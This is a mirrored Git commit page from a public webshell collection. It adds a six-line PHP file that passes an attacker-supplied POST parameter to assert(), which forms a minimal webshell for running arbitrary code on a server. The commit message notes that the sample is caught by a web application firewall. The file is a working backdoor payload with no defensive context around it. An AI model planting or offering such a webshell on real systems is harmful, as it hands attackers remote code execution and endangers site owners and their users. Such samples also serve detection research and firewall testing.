mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create 2020.08.20.06.php
from : https://www.sqlsec.com/2020/07/shell.html killed by safedog
This commit is contained in:
parent
d8cdd62ab1
commit
d5f61a9c5f
1 changed files with 6 additions and 0 deletions
6
php/2020.08.20.06.php
Normal file
6
php/2020.08.20.06.php
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
function sqlsec($a){
|
||||
assert($a);
|
||||
}
|
||||
sqlsec($_POST['x']);
|
||||
?>
|
Loading…
Reference in a new issue